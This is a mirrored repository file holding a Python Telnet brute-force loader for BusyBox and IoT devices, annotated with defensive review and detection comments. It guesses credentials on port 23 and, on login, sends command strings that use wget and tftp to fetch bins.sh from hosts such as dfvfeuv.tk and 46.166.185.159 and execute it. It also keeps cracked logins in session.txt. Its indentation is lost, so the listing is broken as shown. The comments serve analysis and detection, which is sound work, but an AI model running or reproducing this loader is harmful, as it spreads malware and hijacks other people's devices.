mirror of https://github.com/threatland/TL-BOTS synced 2024-06-20 14:00:11 +00:00
TL-BOTS/TL.EXPLOIT_SCAN/EXPLOIT.BusyBox/busybox.a271c2.py
2019-10-02 16:41:26 -04:00


#!/usr/bin/env python
#
#
# I didn't really check for backdoors, so please be careful
#
#
#
from Queue import *
from sys import stdout
import threading, sys, time, random, socket, re, os, logging
# Start-up section of a Telnet credential-guessing loader (Python 2 syntax).
# NOTE(review): indentation was lost in this listing, so block nesting is
# inferred from statement order and is not shown by the text itself.
#
# Arguments: argv[1] = file of target addresses, argv[2] = dictionary file in
# "user:pass" form, argv[3] = number of worker threads, argv[4] = number of
# addresses a worker takes per batch.
if len(sys.argv) < 5:
print "Example: python %s targets.txt dictionary.txt <threads(1-100)> <ips per scan(100-1000)>" % (str(sys.argv[0]))
print "Dictionary should be in user:pass format"
sys.exit(1)
# Banner printed with ANSI colour escape sequences.
print "\x1b[1;32m***********************\x1b[1;35m"
print "\x1b[1;32m* YAAAAAAAAAAAAAAAAAA *\x1b[1;35m"
print "\x1b[1;32m***********************\x1b[1;35m"
#ip=sys.argv[1]
filename=sys.argv[2]
threads = int(sys.argv[3])
h0h0 = int(sys.argv[4])
# The whole target list is read into memory; each entry keeps its trailing
# newline until worker() strips it.
ips = open(sys.argv[1], "r").readlines()
queue = Queue()
qcount = 0
# Command strings sent over the Telnet session after a login is accepted (see
# attempt()). Only wget, tftp1 and tftp2 are live; the commented-out variants
# use nc, ftpget and curl for the same purpose. Each live string changes into a
# directory, retrieves bins.sh from a remote host, stores it as dvrHelper,
# writes its contents over a local copy of /bin/busybox, runs that file and
# then deletes both files. NOTE(review): overwriting a copy of busybox
# presumably reuses that file's executable mode, since no chmod is issued in
# the live strings - confirm.
# Indicators for detection and forensics that appear on this page: hostnames
# dfvfeuv.tk and kimuuk.tk, address 46.166.185.159, URL path /bins/bins.sh,
# and the file names dvrHelper and busybox created in /tmp, /var, /dev/shm,
# /var/tmp, /var/run, /etc, /mnt, /root or /.
#cd /tmp || cd /var/run || cd /etc || cd /mnt || cd /root || cd /; rm -rf busybox dvrHelper; wget http://kimuuk.tk/bins/bins.sh -O dvrHelper ; cp /bin/busybox ./; busybox cat dvrHelper > busybox;./busybox ;rm -rf busybox dvrHelper
wget = "cd /tmp || cd /var || cd /dev/shm || cd /var/tmp || cd /root || cd /; wget http://dfvfeuv.tk/bins/bins.sh -O dvrHelper ; cp /bin/busybox ./; busybox cat dvrHelper > busybox;./busybox ;rm -rf busybox dvrHelper"
#echo = "cd /var/; rm -rf busybox filename; rm -rf busybox armv4l.sh; echo -ne 'GET /armv4l.sh HTTP/1.0\r\nHost: 46.166.185.159\r\n\r\n' | nc 46.166.185.159 80 > armv4l.sh; chmod +x *; sed -i 1,9d armv4l.sh; cp /bin/busybox ./; busybox cat armv4l.sh > armv4l.sh; chmod +x armv4l.sh; ./armv4l.sh; rm -rf busybox armv4l.sh;"
tftp1 = "cd /tmp || cd /var/run || cd /etc || cd /mnt || cd /root || cd /; rm -rf busybox dvrHelper; tftp 46.166.185.159 -c get bins.sh; mv bins.sh dvrHelper ; cp /bin/busybox ./; busybox cat dvrHelper > busybox;./busybox ;rm -rf busybox dvrHelper"
tftp2 = "cd /tmp || cd /var/run || cd /etc || cd /mnt || cd /root || cd /; rm -rf busybox dvrHelper; tftp -r bins.sh -g 46.166.185.159; mv bins.sh dvrHelper ; cp /bin/busybox ./; busybox cat dvrHelper > busybox;./busybox ;rm -rf busybox dvrHelper"
#ftpget = "cd /var/; rm -rf armv4l; ftpget -v -u anonymous -p anonymous -P 21 46.166.185.159 armv4l armv4l; cp /bin/busybox ./; busybox cat armv4l > busybox; ./busybox; rm -rf busybox armv4l;"
#curl = "cd /var/; rm -rf armv4l; curl -O http://kimuuk.tk/bins/armv4l; cp /bin/busybox ./; busybox cat armv4l > busybox; ./busybox; rm -rf busybox armv4l;"
# Every line of the target file is queued for the worker threads, with a
# running count written to stdout.
for ip in ips:
qcount += 1
stdout.write("\r[%d] Added to queue" % qcount)
stdout.flush()
queue.put(ip)
print "\n"
# Read from socket `tn` until `string` appears in the accumulated data or
# `timeout` seconds of wall-clock time have passed.
#   tn      - connected socket object (attempt() passes a socket.socket)
#   string  - substring to wait for (attempt() passes ":")
#   timeout - overall limit in seconds, checked only between recv() calls
# Returns the accumulated buffer once `string` is found. With the raise below
# commented out, no value is returned when the limit is reached, so the result
# is None in that case.
# NOTE(review): indentation is missing in this listing; the substring check is
# presumably inside the while loop - confirm against an intact copy.
def readUntil(tn, string, timeout=20):
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
# recv() can block for as long as the socket's own timeout allows; the
# caller sets that to 5 seconds before calling this function.
buf += tn.recv(1024)
time.sleep(0.01)
if string in buf: return buf
#raise Exception('TIMEOUT!')
# Worker thread body: repeatedly takes a batch of h0h0 + 1 addresses from the
# shared queue and starts one ipthread per address.
# Network-side pattern for detection: each batch opens Telnet sessions to many
# distinct addresses within a short window, with about 9 ms between thread
# starts.
# NOTE(review): indentation is missing in this listing, so which except clause
# pairs with which try is inferred from order - confirm.
def worker():
try:
while True:
try:
# sys.exit() raises SystemExit in this thread only; the bare except
# clauses below catch SystemExit as well as ordinary errors.
if queue.empty() == True:
sys.exit(1)
iplist = []
h0h0h0 = h0h0 + 1
#print "\033[33mGathering IPs\033[37m"%(ip.rstrip("\n"))
for x in xrange(h0h0h0):
# queue.get() blocks while the queue is empty.
ip = queue.get()
iplist.append(ip)
#print "\033[33mIP Address Obtained \033[32m%s\033[37m"%(ip.rstrip("\n"))
# The entry is marked done as soon as it is dequeued, before any
# connection to it has been attempted.
queue.task_done()
time.sleep(1.5)
for ip in iplist:
# The second argument is the literal string "null"; ipthread does not use it.
t = threading.Thread(target=ipthread, args=(ip.rstrip(),"null"))
t.start()
time.sleep(0.009)
time.sleep(1)
#print "\033[32mStarting Telnet Threads\033[37m"
except:
print "\033[31mWORKER ERROR\033[37m" #will fuk up if more threads/workers then ips in list
pass
except:
pass
# Try one username/password pair against the Telnet service (TCP port 23) on IP
# and, if the reply looks like a command shell, send the download-and-run
# command strings defined at module level.
#   IP       - target address as a string
#   UserName - login name to send
#   Password - password to send
# Returns nothing. A session judged successful is appended to session.txt in
# the working directory and printed to stdout.
# Detection notes: immediately after the password the client sends the bare
# words "wget", "tftp" and "ifconfig" on separate lines, then reads once and
# decides; a Telnet honeypot or IDS can key on that three-line sequence. Any
# reply containing one of the substrings tested below causes the full command
# strings to be sent, so a low-interaction honeypot that answers with such
# text captures the download hosts in clear text.
# Mitigation on the device side is to disable Telnet or replace default
# credentials.
# NOTE(review): indentation is missing in this listing; the three try/except
# groups appear to run one after another, each closing the socket on error, so
# a failure in an earlier group presumably makes the later groups fail on the
# closed socket and fall into their own except - confirm.
def attempt(IP,UserName,Password):
try:
# ip, username and password are local copies that are not read again in
# this function.
ip=IP
username=UserName
password=Password
tn = socket.socket()
tn.settimeout(5)
tn.connect((IP, 23))
#except Exception:
#print "[%s] Timeout"%(count)
#try:
time.sleep(0.01)
hoho = ''
# readUntil gives None when its time limit passes; adding None to a str
# raises TypeError, which the except below catches.
hoho += readUntil(tn, ":")
# Matches "login"/"Login" and "username"/"Username" prompts.
if "ogin" in hoho or "sername" in hoho:
tn.send(UserName + "\n")
except Exception:
tn.close()
try:
hoho = ''
hoho += readUntil(tn, ":")
if "assword" in hoho:
tn.send(Password + "\n")
# Probe commands: their output or error text is used below to decide
# whether a shell answered.
tn.send("wget\n")
tn.send("tftp\n")
tn.send("ifconfig\n")
time.sleep(3)
except Exception:
tn.close()
try:
mp = ''
# A single read of at most 1024 bytes is all that is inspected.
mp += tn.recv(1024)
#if "#" in mp or "$" in mp or "@" in mp or ">" in mp:
if "addr" in mp or "Usage" in mp or "wget:" in mp or "tftp:" in mp or "ifconfig:" in mp or "@" in mp:
tn.send(wget + "\n")
#tn.send(echo + "\n")
tn.send(tftp1 + "\n")
tn.send(tftp2 + "\n")
#tn.send(ftpget + "\n")
#tn.send(curl + "\n")
print '\x1b[1;32mFound \x1b[1;31m '+IP+':23 \x1b[1;35m'+UserName+':\x1b[1;36m'+Password+'\x1b[1;33m'
# Forensic artifact on the operator's host: lines of the form
# "IP:23 user:pass" appended in plain text.
f = open('session.txt', 'a')
f.write("%s:23 %s:%s\n" % (IP, UserName, Password))
f.close()
time.sleep(15)
tn.close()
except Exception:
tn.close()
# For one target address, start a separate attempt() thread for every
# "user:pass" line in the dictionary file named on the command line.
#   ip   - target address as a string
#   null - unused placeholder; worker() passes the literal string "null"
# The dictionary file is reopened and read in full for each address. Threads
# are started 0.3 s apart and are not joined, so several sessions to the same
# address can be open at once; repeated port-23 logins from one source at this
# spacing are a usable rate signature for detection.
def ipthread(ip,null):
fd = open(filename, "r")
for line in fd.readlines():
# Each line is expected to contain exactly one ":" separating the two fields.
username, password = line.strip().split(":")
t = threading.Thread(target=attempt, args=(ip,username,password))
t.start()
time.sleep(0.3)
fd.close()
# Start the requested number of worker threads as daemon threads, then wait on
# the queue.
for g in xrange(threads):
t = threading.Thread(target=worker)
t.setDaemon(True)
t.start()
time.sleep(0.001)
# worker() calls task_done() right after each get(), so join() returns once
# every address has been dequeued rather than when the connection attempts
# have finished. The ipthread and attempt threads are not daemon threads, so
# the process can remain alive after "Finished!" is printed.
queue.join()
print "Finished!"